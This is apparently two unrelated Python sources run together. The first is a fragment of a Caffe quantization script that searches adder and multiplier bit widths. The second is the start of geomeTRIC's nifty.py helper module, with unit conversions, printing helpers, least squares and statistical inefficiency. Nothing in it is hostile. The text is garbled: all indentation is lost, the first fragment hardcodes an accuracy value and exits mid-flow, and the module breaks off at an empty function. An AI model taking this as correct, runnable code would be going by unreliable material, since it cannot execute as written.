deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = -1
adderIL_reduction = 0
multIL_reduction = 0
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
#p.start()
#p.join()
#ap = shared_dict['DQ-DQ-DQ-32-32']
ap = 0.695373
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis2.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
sys.exit(0)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
|
nifty.py
|
"""@package geometric.nifty Nifty functions, originally intended to be imported by any module within ForceBalance.
This file was copied over from ForceBalance to geomeTRIC in order to lighten the dependencies of the latter.
Table of Contents:
- I/O formatting
- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import os
import re
import shutil
import sys
from select import select
import numpy as np
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
# Set up the logger #
#================================#
try:
from .output import *
except ImportError:
from logging import *
class RawStreamHandler(StreamHandler):
"""Exactly like output.StreamHandler except it does no extra formatting
before sending logging messages to the stream. This is more compatible with
how output has been displayed in ForceBalance. Default stream has also been
changed from stderr to stdout"""
def __init__(self, stream = sys.stdout):
super(RawStreamHandler, self).__init__(stream)
def emit(self, record):
message = record.getMessage()
self.stream.write(message)
self.flush()
logger=getLogger()
logger.handlers = [RawStreamHandler(sys.stdout)]
logger.setLevel(INFO)
try:
import bz2
HaveBZ2 = True
except ImportError:
logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
HaveBZ2 = False
try:
import gzip
HaveGZ = True
except ImportError:
logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
HaveGZ = False
## Boltzmann constant
kb = 0.0083144100163
## Q-Chem to GMX unit conversion for energy
eqcgmx = 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -49621.9
# Conversion factors
bohr2ang = 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
# Gradient units
au2evang = 51.42209166566339
evang2au = 1.0 / au2evang
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
"""Printout of a 1-D vector.
@param[in] vec1d a 1-D vector
"""
v2a = np.array(vec1d)
for i in range(v2a.shape[0]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % v2a[i])
logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
""" Write an array to a string so we can use it to key a dictionary. """
return ' '.join([("%% .%ie " % precision % i) for i in vec1d])
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
"""Printout of a 2-D matrix.
@param[in] mat2d a 2-D matrix
"""
m2a = np.array(mat2d)
for i in range(m2a.shape[0]):
for j in range(m2a.shape[1]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % m2a[i][j])
logger.log(loglevel, '\n')
def grouper(iterable, n):
"""Collect data into fixed-length chunks or blocks"""
    # grouper('ABCDEFG', 3) --> [['A','B','C'], ['D','E','F'], ['G']]  (the trailing chunk may be short)
args = [iter(iterable)] * n
lzip = [[j for j in i if j is not None] for i in list(zip_longest(*args))]
return lzip
def encode(l):
return [[len(list(group)),name] for name, group in itertools.groupby(l)]
def segments(e):
# Takes encoded input.
begins = np.array([sum([k[0] for k in e][:j]) for j,i in enumerate(e) if i[1] == 1])
lens = np.array([i[0] for i in e if i[1] == 1])
return [(i, i+j) for i, j in zip(begins, lens)]
def commadash(l):
# Formats a list like [27, 28, 29, 30, 31, 88, 89, 90, 91, 100, 136, 137, 138, 139]
    # into '27-31,88-91,100,136-139'
L = sorted(l)
if len(L) == 0:
return "(empty)"
L.append(L[-1]+1)
LL = [i in L for i in range(L[-1])]
return ','.join('%i-%i' % (i[0]+1,i[1]) if (i[1]-1 > i[0]) else '%i' % (i[0]+1) for i in segments(encode(LL)))
def uncommadash(s):
# Takes a string like '27-31,88-91,100,136-139'
# and turns it into a list like [26, 27, 28, 29, 30, 87, 88, 89, 90, 99, 135, 136, 137, 138]
L = []
try:
for w in s.split(','):
ws = w.split('-')
a = int(ws[0])-1
if len(ws) == 1:
b = int(ws[0])
elif len(ws) == 2:
b = int(ws[1])
else:
logger.warning("Dash-separated list cannot exceed length 2\n")
raise
if a < 0 or b <= 0 or b <= a:
if a < 0 or b <= 0:
logger.warning("Items in list cannot be zero or negative: %d %d\n" % (a, b))
else:
logger.warning("Second number cannot be smaller than first: %d %d\n" % (a, b))
raise
newL = range(a,b)
if any([i in L for i in newL]):
logger.warning("Duplicate entries found in list\n")
raise
L += newL
if sorted(L) != L:
logger.warning("List is out of order\n")
raise
except:
logger.error('Invalid string for converting to list of numbers: %s\n' % s)
raise RuntimeError
return L
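# Illustrative sketch (arbitrary example indices): a quick self-check of the
# commadash/uncommadash pair defined above; the two functions are inverses of
# each other up to the 1-based formatting of the string.
def _example_commadash_roundtrip():
    atoms = [26, 27, 28, 29, 30, 87, 88, 89, 90, 99]
    dashed = commadash(atoms)              # -> '27-31,88-91,100'
    assert uncommadash(dashed) == atoms
    return dashed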
def natural_sort(l):
""" Return a natural sorted list. """
# Convert a character to a digit or a lowercase character
convert = lambda text: int(text) if text.isdigit() else text.lower()
# Split string into "integer" and "noninteger" fields and convert each one
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# Sort strings using these keys in descending order of importance, I guess.
return sorted(l, key = alphanum_key)
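# Illustrative sketch: natural_sort() orders embedded integers numerically
# rather than lexically, so 'frame2' comes before 'frame10'. The file names
# are made up for the example.
def _example_natural_sort():
    names = ['frame10.xyz', 'frame2.xyz', 'frame1.xyz']
    return natural_sort(names)             # -> ['frame1.xyz', 'frame2.xyz', 'frame10.xyz']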
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
"""Cool-looking printout for slick formatting of output.
@param[in] text The string that the printout is based upon. This function
will print out the string, ANSI-colored and enclosed in the symbol
for example:\n
<tt> ################# </tt>\n
<tt> ### I am cool ### </tt>\n
<tt> ################# </tt>
@param[in] sym The surrounding symbol\n
@param[in] bold Whether to use bold print
@param[in] color The ANSI color:\n
1 red\n
2 green\n
3 yellow\n
4 blue\n
5 magenta\n
6 cyan\n
7 white
@param[in] bottom The symbol for the bottom bar
@param[in] minwidth The minimum width for the box, if the text is very short
then we insert the appropriate number of padding spaces
@return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
"""
def newlen(l):
return len(re.sub("\x1b\[[0-9;]*m","",l))
text = text.split('\n')
width = max(minwidth,max([newlen(line) for line in text]))
bar = ''.join([sym2 for i in range(width + 6)])
bar = sym + bar + sym
#bar = ''.join([sym for i in range(width + 8)])
logger.info('\r'+bar + '\n')
for ln, line in enumerate(text):
if type(center) is list: c1 = center[ln]
else: c1 = center
if c1:
padleft = ' ' * (int((width - newlen(line))/2))
else:
padleft = ''
padright = ' '* (width - newlen(line) - len(padleft))
if ansi is not None:
ansi = str(ansi)
logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
elif color is not None:
if color == 0 and bold:
logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
elif color == 0:
logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
else:
logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
# if color == 3 or color == 7:
# print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
# else:
# print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
else:
warn_press_key("Inappropriate use of printcool")
logger.info(bar + '\n')
botbar = ''.join([bottom for i in range(width + 8)])
return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
"""See documentation for printcool; this is a nice way to print out keys/values in a dictionary.
The keys in the dictionary are sorted before printing out.
@param[in] dict The dictionary to be printed
@param[in] title The title of the printout
"""
if Dict is None: return
bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
def magic_string(str):
# This cryptic command returns a string with the number of characters specified as a variable. :P
        # Useful for printing nice-looking dictionaries, I guess.
# print "\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"'))
return eval("\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"')))
if isinstance(Dict, OrderedDict):
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
else:
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
"""ONLY matches integers! If you have a decimal point? None shall pass!
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is an integer (only +/- sign followed by digits)
"""
try:
word = str(word)
except:
return False
return re.match('^[-+]?[0-9]+$', word)
def isfloat(word):
"""Matches ANY number; it can be a decimal, scientific notation, what have you
CAUTION - this will also match an integer.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is any number
"""
try: word = str(word)
except: return False
if len(word) == 0: return False
return re.match('^[-+]?[0-9]*\.?[0-9]*([eEdD][-+]?[0-9]+)?$',word)
def isdecimal(word):
"""Matches things with a decimal only; see isint and isfloat.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is a number with a decimal point
"""
try: word = str(word)
except: return False
return isfloat(word) and not isint(word)
def floatornan(word):
"""Returns a big number if we encounter NaN.
@param[in] word The string to be converted
@return answer The string converted to a float; if not a float, return 1e10
@todo I could use suggestions for making this better.
"""
big = 1e10
if isfloat(word):
return float(word)
else:
logger.info("Setting %s to % .1e\n" % big)
return big
def col(vec):
"""
Given any list, array, or matrix, return a 1-column matrix.
Input:
vec = The input vector that is to be made into a column
Output:
A column matrix
"""
return np.matrix(np.array(vec).reshape(-1, 1))
def row(vec):
"""Given any list, array, or matrix, return a 1-row matrix.
@param[in] vec The input vector that is to be made into a row
@return answer A row matrix
"""
return np.matrix(np.array(vec).reshape(1, -1))
def flat(vec):
"""Given any list, array, or matrix, return a single-index array.
@param[in] vec The data to be flattened
@return answer The flattened data
"""
return np.array(vec).reshape(-1)
def est124(val):
"""Given any positive floating point value, return a value [124]e+xx
that is closest to it in the log space.
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log4 = 0.6020599913279624
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log4):
fac = 2.0
elif logfrac < 0.5*(log4+log10):
fac = 4.0
else:
fac = 10.0
return fac*10**logint
def est1234568(val):
"""Given any positive floating point value, return a value [1234568]e+xx
that is closest to it in the log space. Just because I don't like seven
and nine. Call me a numberist?
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log3 = np.log10(3)
log4 = 0.6020599913279624
log5 = np.log10(5)
log6 = np.log10(6)
log8 = np.log10(8)
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log3):
fac = 2.0
elif logfrac < 0.5*(log3+log4):
fac = 3.0
elif logfrac < 0.5*(log4+log5):
fac = 4.0
elif logfrac < 0.5*(log5+log6):
fac = 5.0
elif logfrac < 0.5*(log6+log8):
fac = 6.0
elif logfrac < 0.5*(log8+log10):
fac = 8.0
else:
fac = 10.0
return fac*10**logint
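# Illustrative sketch (arbitrary input values): est124() and est1234568() snap
# a positive number to the nearest "round" value in log space.
def _example_est_rounding():
    assert abs(est124(3.7e-3) - 4.0e-3) < 1e-12      # 3.7e-3 -> 4e-3
    assert abs(est124(7.2e5) - 1.0e6) < 1e-3         # 7.2e5  -> 1e6
    assert abs(est1234568(7.2e5) - 8.0e5) < 1e-3     # 7.2e5  -> 8e5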
def monotonic(arr, start, end):
# Make sure an array is monotonically decreasing from the start to the end.
a0 = arr[start]
i0 = start
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
arr[i0:i+1] = np.linspace(a0, arr[i], i-i0+1)
a0 = arr[i]
i0 = i
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
arr[i:i0+1] = np.linspace(arr[i], a0, i0-i+1)
a0 = arr[i]
i0 = i
i -= 1
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
"""
Return the indices of an array corresponding to strictly monotonic
decreasing behavior.
Parameters
----------
arr : numpy.ndarray
Input array
start : int
Starting index (first element if None)
end : int
Ending index (last element if None)
Returns
-------
indices : numpy.ndarray
Selected indices
"""
if start is None:
start = 0
if end is None:
end = len(arr) - 1
a0 = arr[start]
idx = [start]
if verbose: print("Starting @ %i : %.6f" % (start, arr[start]))
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: print("Including %i : %.6f" % (i, arr[i]))
else:
if verbose: print("Excluding %i : %.6f" % (i, arr[i]))
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: print("Including %i : %.6f" % (i, arr[i]))
else:
if verbose: print("Excluding %i : %.6f" % (i, arr[i]))
i -= 1
return np.array(idx)
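# Illustrative sketch (made-up energies): monotonic_decreasing() keeps the
# indices where the series reaches a new minimum, scanning forward from
# 'start'; note that the final element (index 'end') is not examined.
def _example_monotonic_decreasing():
    energies = np.array([5.0, 4.0, 4.5, 3.0, 3.5, 2.0])
    idx = monotonic_decreasing(energies)   # -> array([0, 1, 3])
    return idx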
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
"""Given two vectors vec1 and vec2, project out the component of vec1
that is along the vec2-direction.
@param[in] vec1 The projectee (i.e. output is some modified version of vec1)
@param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
@return answer A copy of vec1 but with the vec2-component projected out.
"""
v2u = vec2/np.linalg.norm(vec2)
return vec1 - v2u*np.dot(vec1, v2u)
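# Illustrative sketch: project the vec2-component out of vec1 with
# orthogonalize(); the result is perpendicular to vec2.
def _example_orthogonalize():
    vec1 = np.array([3.0, 4.0, 0.0])
    vec2 = np.array([1.0, 0.0, 0.0])
    out = orthogonalize(vec1, vec2)        # -> array([0., 4., 0.])
    assert abs(np.dot(out, vec2)) < 1e-12
    return out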
def invert_svd(X,thresh=1e-12):
"""
Invert a matrix using singular value decomposition.
@param[in] X The matrix to be inverted
@param[in] thresh The SVD threshold; eigenvalues below this are not inverted but set to zero
@return Xt The inverted matrix
"""
u,s,vh = np.linalg.svd(X, full_matrices=0)
uh = np.matrix(np.transpose(u))
v = np.matrix(np.transpose(vh))
si = s.copy()
for i in range(s.shape[0]):
if abs(s[i]) > thresh:
si[i] = 1./s[i]
else:
si[i] = 0.0
si = np.matrix(np.diag(si))
Xt = v*si*uh
return Xt
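# Illustrative sketch: for a well-conditioned matrix invert_svd() reproduces
# the ordinary inverse; singular values below 'thresh' are zeroed rather than
# inverted, which is what keeps it stable for near-singular input.
def _example_invert_svd():
    X = np.matrix([[2.0, 0.0], [0.0, 0.5]])
    Xi = invert_svd(X)
    assert np.allclose(Xi, np.matrix([[0.5, 0.0], [0.0, 2.0]]))
    return Xi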
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
"""
@code
__ __
| |
| 1 (x0) (x0)^2 (x0)^3 |
| 1 (x1) (x1)^2 (x1)^3 |
| 1 (x2) (x2)^2 (x2)^3 |
| 1 (x3) (x3)^2 (x3)^3 |
| 1 (x4) (x4)^2 (x4)^3 |
|__ __|
@endcode
@param[in] X (2-D array) An array of X-values (see above)
@param[in] Y (array) An array of Y-values (only used in getting the least squares coefficients)
@param[in] w (array) An array of weights, hopefully normalized to one.
@param[out] Beta The least-squares coefficients
@param[out] Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
@param[out] yfit The fitted y-values
@param[out] MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
"""
# X is a 'tall' matrix.
X = np.matrix(x)
Y = col(y)
n_x = X.shape[0]
n_fit = X.shape[1]
if n_fit > n_x:
logger.warning("Argh? It seems like this problem is underdetermined!\n")
# Build the weight matrix.
if w is not None:
if len(w) != n_x:
warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % len(w), n_x)
w /= np.mean(w)
WH = np.matrix(np.diag(w**0.5))
else:
WH = np.matrix(np.eye(n_x))
# Make the Moore-Penrose Pseudoinverse.
# if n_fit == n_x:
# MPPI = np.linalg.inv(WH*X)
# else:
# This resembles the formula (X'WX)^-1 X' W^1/2
MPPI = np.linalg.pinv(WH*X)
Beta = MPPI * WH * Y
Hat = WH * X * MPPI
yfit = flat(Hat * Y)
# Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
# We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
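# Illustrative sketch (synthetic data): fit y = 1 + 2*x with get_least_squares()
# by building the design matrix of powers of x described in the docstring above.
def _example_least_squares_fit():
    xdata = np.array([0.0, 1.0, 2.0, 3.0])
    ydata = 1.0 + 2.0 * xdata
    X = np.array([[1.0, xi] for xi in xdata])        # columns: 1, x
    Beta, Hat, yfit, MPPI = get_least_squares(X, ydata)
    assert np.allclose(Beta, [1.0, 2.0])
    assert np.allclose(yfit, ydata)
    return Beta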
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
"""
Compute the (cross) statistical inefficiency of (two) timeseries.
Notes
The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
The fast method described in Ref [1] is used to compute g.
References
[1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
histogram analysis method for the analysis of simulated and parallel tempering simulations.
JCTC 3(1):26-41, 2007.
Examples
Compute statistical inefficiency of timeseries data with known correlation time.
>>> import timeseries
>>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
>>> g = statisticalInefficiency(A_n, fast=True)
@param[in] A_n (required, numpy array) - A_n[n] is nth value of
timeseries A. Length is deduced from vector.
@param[in] B_n (optional, numpy array) - B_n[n] is nth value of
timeseries B. Length is deduced from vector. If supplied, the
cross-correlation of timeseries A and B will be estimated instead of
the autocorrelation of timeseries A.
@param[in] fast (optional, boolean) - if True, will use faster (but
less accurate) method to estimate correlation time, described in
Ref. [1] (default: False)
@param[in] mintime (optional, int) - minimum amount of correlation
function to compute (default: 3) The algorithm terminates after
computing the correlation time out to mintime when the correlation
    function first goes negative. Note that this time may need to be
increased if there is a strong initial negative peak in the
correlation function.
@return g The estimated statistical inefficiency (equal to 1 + 2
tau, where tau is the correlation time). We enforce g >= 1.0.
"""
# Create numpy copies of input arguments.
A_n = np.array(A_n)
if B_n is not None:
B_n = np.array(B_n)
else:
B_n = np.array(A_n)
# Get the length of the timeseries.
N = A_n.shape[0]
# Be sure A_n and B_n have the same dimensions.
if A_n.shape != B_n.shape:
logger.error('A_n and B_n must have same dimensions.\n')
raise ParameterError
# Initialize statistical inefficiency estimate with uncorrelated value.
g = 1.0
# Compute mean of each timeseries.
mu_A = A_n.mean()
mu_B = B_n.mean()
# Make temporary copies of fluctuation from mean.
dA_n = A_n.astype(np.float64) - mu_A
dB_n = B_n.astype(np.float64) - mu_B
# Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
# Trap the case where this covariance is zero, and we cannot proceed.
if sigma2_AB == 0:
if warn:
logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
return 1.0
# Accumulate the integrated correlation time by computing the normalized correlation time at
# increasing values of t. Stop accumulating if the correlation function goes negative, since
# this is unlikely to occur unless the correlation function has decayed to the point where it
# is dominated by noise and indistinguishable from zero.
t = 1
increment = 1
while t < N-1:
# compute normalized fluctuation correlation function at time t
C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
# Terminate if the correlation function has crossed zero and we've computed the correlation
# function at least out to 'mintime'.
if (C <= 0.0) and (t > mintime):
break
# Accumulate contribution to the statistical inefficiency.
g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
# Increment t and the amount by which we increment t.
t += increment
# Increase the interval if "fast mode" is on.
if fast: increment += 1
# g must be at least unity
if g < 1.0: g = 1.0
# Return the computed statistical inefficiency.
return g
def mean_stderr(ts):
"""Return mean and standard deviation of a time series ts."""
return np.mean(ts), \
np.std(ts)*np.sqrt(statisticalInefficiency(ts, warn=False)/len(ts))
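# Illustrative sketch (synthetic data): statisticalInefficiency() stays close
# to 1 for uncorrelated noise and grows once correlation is introduced, here
# by a crude 10-point running average.
def _example_statistical_inefficiency():
    rng = np.random.RandomState(0)
    white = rng.normal(size=2000)
    smoothed = np.convolve(white, np.ones(10) / 10.0, mode='valid')
    g_white = statisticalInefficiency(white)
    g_smooth = statisticalInefficiency(smoothed)
    assert g_smooth > g_white
    return g_white, g_smooth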
# Slices a 2D array of data by column. The new array is fed into the statisticalInefficiency function.
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
n_row = A_n.shape[0]
n_col = A_n.shape[-1]
multiD_sI = np.zeros((n_row, n_col))
for col in range(n_col):
if B_n is None:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n, fast, mintime, warn)
else:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n[:,col], fast, mintime, warn)
return multiD_sI
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
""" Write an object to a zipped pickle file specified by the path. """
